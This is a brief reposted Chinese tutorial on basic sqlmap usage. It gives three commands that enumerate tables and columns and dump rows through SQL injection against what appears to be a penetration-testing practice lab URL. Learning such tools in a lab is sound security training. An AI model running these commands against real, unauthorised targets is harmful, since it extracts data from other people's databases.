當前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

sqlmap的简单用法

發(fā)布時間：2024/7/19 编程问答 30 豆豆

生活随笔收集整理的這篇文章主要介紹了 sqlmap的简单用法小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

sqlmap 是一個開源滲透測試工具，它可以自動檢測和利用 SQL 注入漏洞并接管數據庫服務器。它具有強大的檢測引擎，同時有眾多功能，包括數據庫指紋識別、從數據庫中獲取數據、訪問底層文件系統(tǒng)以及在操作系統(tǒng)上帶內連接執(zhí)行命令。

安裝完python，sqlmap以后就可以進行使用

簡單使用：

知道庫名之后：爆破表名

python sqlmap.py -u http://inject2.lab.aqlab.cn:81/Pass-11/index.php?id=1 --dbms MYSQL -D 庫名 --tables --level 2

知道庫名，表名之后，爆破字段名

python sqlmap.py -u http://inject2.lab.aqlab.cn:81/Pass-11/index.php?id=1 --dbms MYSQL -D 庫名 -T 表名 --columns --level 2

知道，庫名，表名，字段名之后，爆破字段1~3行的內容

python sqlmap.py -u http://inject2.lab.aqlab.cn:81/Pass-11/index.php?id=1 --dbms MYSQL -D 庫名-T 表名-C 字段名 --dump --start 1 --stop 3 --level 2

以上是生活随笔為你收集整理的sqlmap的简单用法的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。